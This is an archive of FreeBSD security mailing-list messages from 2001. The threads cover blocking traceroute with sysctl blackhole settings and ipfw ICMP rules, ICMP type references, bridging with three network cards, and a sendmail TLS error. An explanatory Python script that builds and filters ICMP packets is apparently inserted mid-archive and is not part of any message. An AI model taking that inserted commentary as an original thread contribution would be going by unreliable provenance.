Received: from 78kw954 (dyn216-8-131-5.ADSL.mnsi.net [216.8.131.5]) (authenticated) by comp1.mastery.ca (8.11.3/8.11.1) with ESMTP id f5QN1fQ01294; Tue, 26 Jun 2001 19:01:41 -0400 (EDT) (envelope-from mail@max-info.net)
Message-ID: <003401c0fe93$a3f405e0$3200a8c0@Home>
From: "Ryan Masse"
To: "alexus"
Cc:
References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> <20010625093731.A934@ringworld.oblivion.bg> <01ec01c0fdb1$6c9cada0$9865fea9@book> <20010626085804.E780@ringworld.oblivion.bg> <002701c0fe76$7530eab0$01000001@book>
Subject: Re: disable traceroute to my host
Date: Tue, 26 Jun 2001 18:59:20 -0400
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
did u get my post about blackhole?

man blackhole

     In the UDP instance, enabling blackhole behaviour turns off the sending
     of an ICMP port unreachable message in response to a UDP datagram which
     arrives on a port where there is no socket listening.  It must be noted
     that this behaviour will prevent remote systems from running
     traceroute(8) to your system.

The following would enable the use of blackhole on your system:

sysctl -w net.inet.tcp.blackhole=2
sysctl -w net.inet.udp.blackhole=1

The above would block *nix traceroutes using the udp method. Simply use ipfw icmptype to block all MS attempts.

Ryan

> someone else using ttl=1? that sucks.. oh well i guess it's impossible to
> disable it.. cuz i don't want to block something that should work..
>
> thanks everyone
From owner-freebsd-security Wed Jun 27 0:55:10 2001
Delivered-To: freebsd-security@freebsd.org
Received: from adm.sci-nnov.ru (adm.sci-nnov.ru [195.122.226.2]) by hub.freebsd.org (Postfix) with ESMTP id AD59E37B405 for ; Wed, 27 Jun 2001 00:55:04 -0700 (PDT) (envelope-from 3APA3A@SECURITY.NNOV.RU)
Received: from anonymous.sandy.ru (anonymous.sandy.ru [195.122.226.40]) by adm.sci-nnov.ru (8.9.3/Dmiter-4.1-AGK-0.5) with ESMTP id LAA25626; Wed, 27 Jun 2001 11:43:25 +0400 (MSD)
Date: Wed, 27 Jun 2001 11:43:24 +0400
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
X-Mailer: The Bat! (v1.51)
Reply-To: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Organization: http://www.security.nnov.ru
X-Priority: 3 (Normal)
Message-ID: <79255173079.20010627114324@SECURITY.NNOV.RU>
To: Peter Jeremy
Cc: alexus , freebsd-security@FreeBSD.ORG
Subject: Re[2]: disable traceroute to my host
In-Reply-To: <20010627071504.P95583@gsmx07.alcatel.com.au>
References: <006a01c0fb6b$2d64d830$9865fea9@book> <771487721300.20010623150519@SECURITY.NNOV.RU> <009201c0fdad$57c2af00$9865fea9@book> <3181060651.20010626150813@SECURITY.NNOV.RU> <20010627071504.P95583@gsmx07.alcatel.com.au>
MIME-Version: 1.0
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 8bit

Hello Peter,

--Wednesday, June 27, 2001, 1:15:04 AM, you wrote to 3APA3A@SECURITY.NNOV.RU:

PJ> On 2001-Jun-26 15:08:13 +0400, 3APA3A <3APA3A@SECURITY.NNOV.RU> wrote:
>>deny ICMP from (YOURNETWORK) to any icmptypes 0,3,11 out
>>
>>0 - to stop windows traceroute and ping
>>3 - to stop BSD-style traceroute
>>11 - to prevent intermediate
>>router to reply traceroute

PJ> Blocking ICMP type 3 will break Path-MTU discovery (which relies on
PJ> type 3 code 4).

It's possible to combine - deny incoming UDP and outgoing ICMP types 0, 11. In any case - there are a thousand ways to discover a route. Use NAT to hide the internal network.

PJ> Peter

--
~/3APA3A
Всегда будем рады послушать ваше чириканье (Твен)
[We will always be glad to listen to your chirping. (Twain)]

From owner-freebsd-security Wed Jun 27 8:15:14 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ns2.sysadmin-inc.com (ns2.sysadmin-inc.com [209.16.228.145]) by hub.freebsd.org (Postfix) with SMTP id F343E37B405 for ; Wed, 27 Jun 2001 08:15:11 -0700 (PDT) (envelope-from peter@sysadmin-inc.com)
Received: (qmail 75992 invoked by alias); 27 Jun 2001 15:15:11 -0000
Received: from unknown (HELO 98wkst) (10.10.1.70) by ns2.sysadmin-inc.com with SMTP; 27 Jun 2001 15:15:11 -0000
From: "Peter Brezny"
To: "Peter Jeremy"
Cc:
Subject: RE: disable traceroute to my host
Date: Wed, 27 Jun 2001 11:14:26 -0400
Message-ID:
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
In-Reply-To: <20010627071504.P95583@gsmx07.alcatel.com.au>
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Importance: Normal

Peter,

What is a good document to get more info on ICMP types?

Thanks.

Peter Brezny
SysAdmin Services Inc.
From owner-freebsd-security Wed Jun 27 8:20:44 2001
Delivered-To: freebsd-security@freebsd.org
Received: from NTMAIL.avint.net (ntmail.avint.net [198.165.75.239]) by hub.freebsd.org (Postfix) with ESMTP id 6428D37B401 for ; Wed, 27 Jun 2001 08:20:41 -0700 (PDT) (envelope-from graham@avint.net)
Received: from hercules.avint.net ([198.165.75.7]) by NTMAIL.avint.net (Post.Office MTA v3.5.3 release 223 ID# 0-52622U2500L250S0V35) with SMTP id net for ; Wed, 27 Jun 2001 12:49:48 -02-3
From: Graham Rose
Reply-To: graham@infotechcanada.com
Organization: Avalon InterConnect & Infotech Canada
To:
Subject: RE: disable traceroute to my host
Date: Wed, 27 Jun 2001 12:49:31 -0230
X-Mailer: KMail [version 1.0.28]
Content-Type: text/plain
References:
In-Reply-To:
MIME-Version: 1.0
Message-Id: <01062712515103.10969@hercules.avint.net>
Content-Transfer-Encoding: 8bit

http://www.isi.edu/in-notes/iana/assignments/icmp-parameters
www.iana.org

On Wed, 27 Jun 2001, Peter Brezny wrote:
> Peter,
>
> What is a good document to get more info on ICMP types?
>
> Thanks.
>
> Peter Brezny
> SysAdmin Services Inc.

From owner-freebsd-security Wed Jun 27 8:23:10 2001
Delivered-To: freebsd-security@freebsd.org
Received: from kcmgwp01.corp.sprint.com (parker1.sprint.com [208.18.122.165]) by hub.freebsd.org (Postfix) with ESMTP id A5B5937B401 for ; Wed, 27 Jun 2001 08:23:06 -0700 (PDT) (envelope-from steve.d.meacham@mail.sprint.com)
Received: from kcmgwp02.corp.sprint.com (kcmgwp02 [10.185.6.93]) by kcmgwp01.corp.sprint.com (Switch-2.0.2/Switch-2.0.2) with ESMTP id f5RFMaV17189; Wed, 27 Jun 2001 10:22:38 -0500 (CDT)
Received: from kcopmp01.corp.sprint.com (kcopmp01m.corp.sprint.com [10.74.2.72]) by kcmgwp02.corp.sprint.com (Switch-2.0.2/Switch-2.0.2) with ESMTP id f5RFMaW03514; Wed, 27 Jun 2001 10:22:36 -0500 (CDT)
Received: from localhost (root@localhost) by kcopmp01.corp.sprint.com (8.8.6 (PHNE_17190)/8.8.6) with ESMTP id KAA15908; Wed, 27 Jun 2001 10:22:35 -0500 (CDT)
From: steve.d.meacham@mail.sprint.com
X-OpenMail-Hops: 1
Date: Wed, 27 Jun 2001 10:22:35 -0500
Message-Id:
Subject: RE: disable traceroute to my host
MIME-Version: 1.0
To: peter.jeremy@alcatel.com.au, peter@sysadmin-inc.com
Cc: freebsd-security@FreeBSD.ORG
Content-Type: multipart/mixed; boundary="openmail-part-484610c8-00000001"

Check out the book "Building Internet Firewalls" by Zwicky, Cooper & Chapman from O'Reilly. It describes ICMP types and how to filter and deal with them. It also covers most of the other protocols you're likely to encounter as a firewall administrator.

Oh... ISBN 1-56592-871-7

Steven

-----Original Message-----
From: peter [mailto:peter@sysadmin-inc.com]
Sent: Wednesday, June 27, 2001 10:14 AM
To: peter.jeremy
Cc: peter; freebsd-security
Subject: RE: disable traceroute to my host

Peter,

What is a good document to get more info on ICMP types?

Thanks.

Peter Brezny
SysAdmin Services Inc.
From owner-freebsd-security Wed Jun 27 8:23:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from bunrab.catwhisker.org (adsl-63-193-123-122.dsl.snfc21.pacbell.net [63.193.123.122]) by hub.freebsd.org (Postfix) with ESMTP id 3A89E37B405 for ; Wed, 27 Jun 2001 08:23:24 -0700 (PDT) (envelope-from david@catwhisker.org)
Received: (from david@localhost) by bunrab.catwhisker.org (8.11.4/8.11.4) id f5RFMxF45954 for freebsd-security@FreeBSD.ORG; Wed, 27 Jun 2001 08:22:59 -0700 (PDT)
Date: Wed, 27 Jun 2001 08:22:59 -0700 (PDT)
From: David Wolfskill
Message-Id: <200106271522.f5RFMxF45954@bunrab.catwhisker.org>
Subject: RE: disable traceroute to my host
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To:

>From: "Peter Brezny"
>Date: Wed, 27 Jun 2001 11:14:26 -0400

>Peter,

>What is a good document to get more info on ICMP types?

Well, I'm not Peter, but one of the best is at http://www.isi.edu/in-notes/iana/assignments/icmp-parameters; there's a link to it from http://www.iana.org/numbers.html.

Cheers,
david
--
David H. Wolfskill				david@catwhisker.org
As a computing professional, I believe it would be unethical for me to advise, recommend, or support the use (save possibly for personal amusement) of any product that is or depends on any Microsoft product.
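Where the traceroute thread above ends up is ICMP type 3. The outbound rule quoted by 3APA3A, `deny ICMP from (YOURNETWORK) to any icmptypes 0,3,11 out`, stops a BSD traceroute because that waits for a 3/3 port unreachable from the target, but, as Peter Jeremy notes, it also drops 3/4 fragmentation needed, which Path-MTU discovery depends on. The script below is an added example, not code from the thread: it hand-builds the four ICMP messages involved (echo reply, time exceeded, port unreachable and fragmentation needed, each error carrying a made-up quoted datagram), parses them (RFC 1071 checksum, next-hop MTU of a 3/4, the UDP port of the probe quoted in a 3/3 or 11/0) and applies both the type-only policy quoted in the thread and a type-and-code policy to them.

```python
"""ICMP messages a traceroute waits for versus the one Path-MTU discovery needs,
with two outbound filter policies applied to each. Added example, not code from
the thread; every packet below is constructed by hand."""
import struct
from typing import Callable, Dict

ECHO_REPLY, DEST_UNREACH, TIME_EXCEEDED = 0, 3, 11
PORT_UNREACH, FRAG_NEEDED = 3, 4          # codes of type 3 (RFC 792, RFC 1191)
TRACEROUTE_BASE_PORT = 33434              # first UDP port a BSD traceroute probes

def checksum(data: bytes) -> int:
    """RFC 1071: one's-complement sum of 16-bit words, complemented."""
    if len(data) % 2:
        data += b"\0"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_icmp(icmp_type: int, code: int, rest: bytes = b"\0" * 4, payload: bytes = b"") -> bytes:
    """Type, code, checksum, four type-specific bytes, then the payload."""
    body = struct.pack("!BBH", icmp_type, code, 0) + rest + payload
    return struct.pack("!BBH", icmp_type, code, checksum(body)) + rest + payload

def quoted_datagram(dst_port: int) -> bytes:
    """What an ICMP error carries: the offending IPv4 header plus the first 8
    bytes of its transport header, here a UDP probe to dst_port (made-up addresses)."""
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 36, 0x1234, 0, 1, 17, 0,
                         bytes([10, 0, 0, 2]), bytes([192, 0, 2, 1]))
    udp_hdr = struct.pack("!HHHH", 40000, dst_port, 16, 0)
    return ip_hdr + udp_hdr

def parse_icmp(pkt: bytes) -> Dict[str, int]:
    """Type and code; the next-hop MTU of a 3/4; the UDP port the quoted probe
    was sent to for 3/x and 11/x. Rejects short headers and bad checksums."""
    if len(pkt) < 8:
        raise ValueError("short ICMP header")
    if checksum(pkt) != 0:                  # a valid packet sums to all ones
        raise ValueError("bad ICMP checksum")
    info = {"type": pkt[0], "code": pkt[1]}
    if pkt[0] == DEST_UNREACH and pkt[1] == FRAG_NEEDED:
        info["mtu"] = struct.unpack("!H", pkt[6:8])[0]
    if pkt[0] in (DEST_UNREACH, TIME_EXCEEDED) and len(pkt) >= 8 + 28:
        ihl = (pkt[8] & 0x0F) * 4
        if pkt[8 + 9] == 17:                # quoted datagram was UDP
            info["probe_port"] = struct.unpack("!H", pkt[8 + ihl + 2:8 + ihl + 4])[0]
    return info

def naive_policy(msg: Dict[str, int]) -> str:
    """The rule quoted in the thread: deny icmptypes 0,3,11 out (type only)."""
    return "deny" if msg["type"] in (ECHO_REPLY, DEST_UNREACH, TIME_EXCEEDED) else "allow"

def pmtud_safe_policy(msg: Dict[str, int]) -> str:
    """Drop what traceroute and ping listen for, keep 3/4 so PMTU discovery works."""
    if msg["type"] in (ECHO_REPLY, TIME_EXCEEDED):
        return "deny"
    if msg["type"] == DEST_UNREACH and msg["code"] == PORT_UNREACH:
        return "deny"                       # end-of-path signal for a UDP traceroute
    return "allow"

# Constructed samples: what a host or router emits in each situation.
SAMPLES = {
    "echo_reply": build_icmp(ECHO_REPLY, 0, rest=struct.pack("!HH", 0x4242, 1), payload=b"ping"),
    "time_exceeded": build_icmp(TIME_EXCEEDED, 0, payload=quoted_datagram(TRACEROUTE_BASE_PORT + 2)),
    "port_unreachable": build_icmp(DEST_UNREACH, PORT_UNREACH,
                                   payload=quoted_datagram(TRACEROUTE_BASE_PORT + 7)),
    "frag_needed": build_icmp(DEST_UNREACH, FRAG_NEEDED, rest=struct.pack("!HH", 0, 1492),
                              payload=quoted_datagram(80)),
}

def apply_policy(policy: Callable[[Dict[str, int]], str]) -> Dict[str, str]:
    """Verdict of `policy` for every sample message."""
    return {name: policy(parse_icmp(pkt)) for name, pkt in SAMPLES.items()}

if __name__ == "__main__":
    for name, policy in (("icmptypes 0,3,11", naive_policy), ("type and code", pmtud_safe_policy)):
        print(f"{name:18} {apply_policy(policy)}")
    print("next-hop MTU carried in the 3/4:", parse_icmp(SAMPLES["frag_needed"])["mtu"])
```

ipfw's icmptypes option selects on type alone, so the type-and-code policy above cannot be written as one ipfw rule; that is why the later suggestion in the thread takes type 3 out of the ICMP rule and blocks the inbound UDP probes instead, or, as Ryan's post shows, suppresses the port unreachable with net.inet.udp.blackhole=1. Either leaves 3/4 alone.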
From owner-freebsd-security Wed Jun 27 9:46:24 2001
Delivered-To: freebsd-security@freebsd.org
Received: from prox.centtech.com (moat2.centtech.com [206.196.95.21]) by hub.freebsd.org (Postfix) with ESMTP id 998CB37B409 for ; Wed, 27 Jun 2001 09:46:18 -0700 (PDT) (envelope-from anderson@centtech.com)
Received: (from smap@localhost) by prox.centtech.com (8.9.3+Sun/8.9.3) id LAA21923 for ; Wed, 27 Jun 2001 11:46:15 -0500 (CDT)
Received: from sprint.centtech.com(10.177.173.31) by prox via smap (V2.1+anti-relay+anti-spam) id xma021921; Wed, 27 Jun 01 11:46:13 -0500
Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.9.3+Sun/8.9.3) with ESMTP id LAA21410 for ; Wed, 27 Jun 2001 11:46:13 -0500 (CDT)
Message-ID: <3B3A0DD7.87EDC7E@centtech.com>
Date: Wed, 27 Jun 2001 11:46:15 -0500
From: Eric Anderson
Reply-To: anderson@centtech.com
Organization: Centaur Technology
X-Mailer: Mozilla 4.77 [en] (X11; U; Linux 2.2.14-5.0smp i686)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security@freebsd.org
Subject: 3 nics - 1 bridge - 2 ips - bad?
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Let's say I have 3 NICs in a machine running FreeBSD 4.2.
Is it possible to have this sort of configuration:
xl0 - 200.200.200.200 - [interface 1 of bridge0]
xl1 - NO IP - [interface 2 of bridge0]
xl2 - 192.168.10.10 - not part of any bridge

The 200.200.200.200 number is of course made up, but signifies an interface on the unprotected net. The 192.168.10.10 interface is also made up, showing an interface on the protected internal net. Now, the xl1 interface is bridged to xl0, creating a port for passing thru to the unprotected net that xl0 is on. Are there any inherent security flaws in this configuration (besides having a possible computer plug into the xl1 port and not being behind a firewall), assuming it works at all?

Thanks in advance..

Eric

--
-------------------------------------------------------------------------------
Eric Anderson anderson@centtech.com Centaur Technology (512) 418-5792
For every complex problem, there is a solution that is simple, neat, and wrong.
-------------------------------------------------------------------------------

From owner-freebsd-security Wed Jun 27 10:12:22 2001
Delivered-To: freebsd-security@freebsd.org
Received: from zogbe.tasam.com (cj45658-a.reston1.va.home.com [65.9.36.73]) by hub.freebsd.org (Postfix) with ESMTP id EC1A937B401 for ; Wed, 27 Jun 2001 10:12:12 -0700 (PDT) (envelope-from freebsd@fireduck.com)
Received: from battleship (zogbe.tasam.com [10.45.45.11] (may be forged)) by zogbe.tasam.com (8.11.4/8.11.4) with SMTP id f5RHCCL36855; Wed, 27 Jun 2001 13:12:12 -0400 (EDT)
Message-ID: <006101c0ff2c$4d75bee0$0a2d2d0a@battleship>
From: "Joseph Gleason"
To: ,
References: <3B3A0DD7.87EDC7E@centtech.com>
Subject: Re: 3 nics - 1 bridge - 2 ips - bad?
Date: Wed, 27 Jun 2001 13:12:10 -0400
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.3018.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

I think you might have a problem with the bridging.

I'm not sure if you can bridge xl0 and xl1 without including xl2. I could be wrong.
And you might be able to pull something off with IPFW rules to exclude xl2 from the bridging, but I wouldn't trust it.

What you want certainly looks like two separate and possibly incompatible tasks. My advice would be to have two machines do this if at all possible. Machine one being your ethernet bridge. Machine two being the gateway to your protected network.

----- Original Message -----
From: "Eric Anderson"
To:
Sent: Wednesday, June 27, 2001 12:46
Subject: 3 nics - 1 bridge - 2 ips - bad?

> Lets say I have 3 NIC's in a machine running FreeBSD 4.2.
> Is it possible to have this sort of configuration:
> xl0 - 200.200.200.200 - [interface 1 of bridge0]
> xl1 - NO IP - [interface 2 of bridge0]
> xl2 - 192.168.10.10 - not part of any bridge
>
> the 200.200.200.200 number is of course made up, but signifies an
> interface on the unprotected net. The 192.168.10.10 interface is also
> made up, showing an interface on the protected internal net. Now, the
> xl1 interface is bridged to xl0, creating a port for passing thru to the
> unprotected net that xl0 is on. Is there any inherent security flaws in
> this configuration (besides having a possible computer plug into the xl1
> port and not being behind a firewall), assuming it works at all?
>
> Thanks in advance..
>
> Eric
>
> --
> -------------------------------------------------------------------------------
> Eric Anderson anderson@centtech.com Centaur Technology (512)
> 418-5792
> For every complex problem, there is a solution that is simple, neat, and
> wrong.
> -------------------------------------------------------------------------------

From owner-freebsd-security Wed Jun 27 10:28:35 2001
Delivered-To: freebsd-security@freebsd.org
Received: from prox.centtech.com (moat2.centtech.com [206.196.95.21]) by hub.freebsd.org (Postfix) with ESMTP id A854C37B409 for ; Wed, 27 Jun 2001 10:28:29 -0700 (PDT) (envelope-from anderson@centtech.com)
Received: (from smap@localhost) by prox.centtech.com (8.9.3+Sun/8.9.3) id MAA23119; Wed, 27 Jun 2001 12:28:23 -0500 (CDT)
Received: from sprint.centtech.com(10.177.173.31) by prox via smap (V2.1+anti-relay+anti-spam) id xma023115; Wed, 27 Jun 01 12:28:08 -0500
Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.9.3+Sun/8.9.3) with ESMTP id MAA23975; Wed, 27 Jun 2001 12:28:07 -0500 (CDT)
Message-ID: <3B3A17A9.5ADF75BA@centtech.com>
Date: Wed, 27 Jun 2001 12:28:09 -0500
From: Eric Anderson
Reply-To: anderson@centtech.com
Organization: Centaur Technology
X-Mailer: Mozilla 4.77 [en] (X11; U; Linux 2.2.14-5.0smp i686)
X-Accept-Language: en
MIME-Version: 1.0
To: Joseph Gleason
Cc: freebsd-security@freebsd.org
Subject: Re: 3 nics - 1 bridge - 2 ips - bad?
References: <3B3A0DD7.87EDC7E@centtech.com> <006101c0ff2c$4d75bee0$0a2d2d0a@battleship>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Thanks for the response.. I think you're correct here, I don't see any way to only enable 2 out of 3 interfaces for bridging. Darn. Oh well, thanks!

Joseph Gleason wrote:
>
> I think you might have a problem with the bridging.
>
> I'm not sure if you can bridge xl0 and xl1 without including xl2. I could
> be wrong
> And you might be able to pull something off with IPFW rules to exclude xl2
> from the bridging, but I wouldn't trust it.
>
> What you want certainly looks like two separate and possibly incompatible
> tasks. My advise would be have two machines do this if at all possible.
> Machine one being your ethernet bridge. Machine two being the gateway to
> your protected network.
>
> ----- Original Message -----
> From: "Eric Anderson"
> To:
> Sent: Wednesday, June 27, 2001 12:46
> Subject: 3 nics - 1 bridge - 2 ips - bad?
>
> > Lets say I have 3 NIC's in a machine running FreeBSD 4.2.
> > Is it possible to have this sort of configuration:
> > xl0 - 200.200.200.200 - [interface 1 of bridge0]
> > xl1 - NO IP - [interface 2 of bridge0]
> > xl2 - 192.168.10.10 - not part of any bridge
> >
> > the 200.200.200.200 number is of course made up, but signifies an
> > interface on the unprotected net. The 192.168.10.10 interface is also
> > made up, showing an interface on the protected internal net. Now, the
> > xl1 interface is bridged to xl0, creating a port for passing thru to the
> > unprotected net that xl0 is on. Is there any inherent security flaws in
> > this configuration (besides having a possible computer plug into the xl1
> > port and not being behind a firewall), assuming it works at all?
> >
> > Thanks in advance..
> >
> > Eric
> >
> > --
> > -------------------------------------------------------------------------------
> > Eric Anderson anderson@centtech.com Centaur Technology (512)
> > 418-5792
> > For every complex problem, there is a solution that is simple, neat, and
> > wrong.
> > -------------------------------------------------------------------------------

--
-------------------------------------------------------------------------------
Eric Anderson anderson@centtech.com Centaur Technology (512) 418-5792
For every complex problem, there is a solution that is simple, neat, and wrong.
-------------------------------------------------------------------------------

From owner-freebsd-security Wed Jun 27 10:31:34 2001
Delivered-To: freebsd-security@freebsd.org
Received: from zogbe.tasam.com (cj45658-a.reston1.va.home.com [65.9.36.73]) by hub.freebsd.org (Postfix) with ESMTP id CD6EC37B405 for ; Wed, 27 Jun 2001 10:31:28 -0700 (PDT) (envelope-from clash@fireduck.com)
Received: from battleship (zogbe.tasam.com [10.45.45.11] (may be forged)) by zogbe.tasam.com (8.11.4/8.11.4) with SMTP id f5RHVRL37050; Wed, 27 Jun 2001 13:31:27 -0400 (EDT)
Message-ID: <002201c0ff2e$fe7c4770$0a2d2d0a@battleship>
From: "Joseph Gleason"
To: , "Joseph Gleason"
Cc:
References: <3B3A0DD7.87EDC7E@centtech.com> <006101c0ff2c$4d75bee0$0a2d2d0a@battleship> <3B3A17A9.5ADF75BA@centtech.com>
Subject: Re: 3 nics - 1 bridge - 2 ips - bad?
Date: Wed, 27 Jun 2001 13:31:26 -0400
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.3018.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

I was wrong! Don't listen to my lies!

I am told that bridging can indeed be enabled and disabled per port via some sysctl call.

With bridge compiled into the kernel:

sysctl -A | grep bridge

should give you the appropriate parameter to play with.

----- Original Message -----
From: "Eric Anderson"
To: "Joseph Gleason"
Cc:
Sent: Wednesday, June 27, 2001 13:28
Subject: Re: 3 nics - 1 bridge - 2 ips - bad?

> Thanks for the response.. I think you're correct here, I don't see
> anyway to only enable 2 out of 3 interfaces for bridging. Darn. Oh
> well, thanks!
>
> Joseph Gleason wrote:
> >
> > I think you might have a problem with the bridging.
> >
> > I'm not sure if you can bridge xl0 and xl1 without including xl2. I could
> > be wrong
> > And you might be able to pull something off with IPFW rules to exclude xl2
> > from the bridging, but I wouldn't trust it.
> >
> > What you want certainly looks like two separate and possibly incompatible
> > tasks. My advise would be have two machines do this if at all possible.
> > Machine one being your ethernet bridge. Machine two being the gateway to
> > your protected network.
> >
> > ----- Original Message -----
> > From: "Eric Anderson"
> > To:
> > Sent: Wednesday, June 27, 2001 12:46
> > Subject: 3 nics - 1 bridge - 2 ips - bad?
> >
> > > Lets say I have 3 NIC's in a machine running FreeBSD 4.2.
> > > Is it possible to have this sort of configuration:
> > > xl0 - 200.200.200.200 - [interface 1 of bridge0]
> > > xl1 - NO IP - [interface 2 of bridge0]
> > > xl2 - 192.168.10.10 - not part of any bridge
> > >
> > > the 200.200.200.200 number is of course made up, but signifies an
> > > interface on the unprotected net. The 192.168.10.10 interface is also
> > > made up, showing an interface on the protected internal net. Now, the
> > > xl1 interface is bridged to xl0, creating a port for passing thru to the
> > > unprotected net that xl0 is on. Is there any inherent security flaws in
> > > this configuration (besides having a possible computer plug into the xl1
> > > port and not being behind a firewall), assuming it works at all?
> > >
> > > Thanks in advance..
> > >
> > > Eric
> > >
> > > --
> > > -------------------------------------------------------------------------------
> > > Eric Anderson anderson@centtech.com Centaur Technology (512)
> > > 418-5792
> > > For every complex problem, there is a solution that is simple, neat, and
> > > wrong.
> > > -------------------------------------------------------------------------------
> >
> --
> -------------------------------------------------------------------------------
> Eric Anderson anderson@centtech.com Centaur Technology (512)
> 418-5792
> For every complex problem, there is a solution that is simple, neat, and
> wrong.
> -------------------------------------------------------------------------------

From owner-freebsd-security Wed Jun 27 11: 6:17 2001
Delivered-To: freebsd-security@freebsd.org
Received: from horsey.gshapiro.net (horsey.gshapiro.net [209.220.147.178]) by hub.freebsd.org (Postfix) with ESMTP id 2A47C37B406; Wed, 27 Jun 2001 11:06:12 -0700 (PDT) (envelope-from gshapiro@gshapiro.net)
Received: from horsey.gshapiro.net (gshapiro@localhost [127.0.0.1]) by horsey.gshapiro.net (8.12.0.Beta12/8.12.0.Beta11) with ESMTP id f5RI65aj057332 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Wed, 27 Jun 2001 11:06:05 -0700 (PDT)
Received: (from gshapiro@localhost) by horsey.gshapiro.net (8.12.0.Beta12/8.12.0.Beta12) id f5RI63JP057329; Wed, 27 Jun 2001 11:06:03 -0700 (PDT)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15162.8331.758404.12379@horsey.gshapiro.net>
Date: Wed, 27 Jun 2001 11:06:03 -0700 From: Gregory Neil Shapiro To: Cc: , Subject: Re: help on TLS error In-Reply-To: <004501c0fe09$c3d74640$a800000a@pentalpha.com.hk> References: <004501c0fe09$c3d74640$a800000a@pentalpha.com.hk> X-Mailer: VM 6.92 under 21.5 (beta1) "anise" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org danny> I found the following error in the log file and the email cannot be send danny> out. How can I find it? And what wrong with it? danny> Jun 26 14:16:40 host sendmail[1069]: f5M9Rr631838: ruleset=tls_server, danny> arg1=SOFTWARE, relay=mail.xxx.com, reject=403 4.7.0 ... TLS danny> handshake failed. Take a look at PR 28361: http://www.FreeBSD.org/cgi/query-pr.cgi?pr=28361 It contains a patch with allows you to enable an FFR and disable TLS for certain *broken* sites such as the one you have found. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 27 11:34:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 33DF737B405 for ; Wed, 27 Jun 2001 11:34:51 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 81741 invoked from network); 27 Jun 2001 18:35:46 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 27 Jun 2001 18:35:46 -0000 Message-ID: <003701c0ff37$e229faa0$01000001@book> From: "alexus" To: "3APA3A" <3APA3A@SECURITY.NNOV.RU>, "Peter Jeremy" Cc: References: <006a01c0fb6b$2d64d830$9865fea9@book> <771487721300.20010623150519@SECURITY.NNOV.RU> <009201c0fdad$57c2af00$9865fea9@book> <3181060651.20010626150813@SECURITY.NNOV.RU> <20010627071504.P95583@gsmx07.alcatel.com.au> <79255173079.20010627114324@SECURITY.NNOV.RU> Subject: Re: Re[2]: 
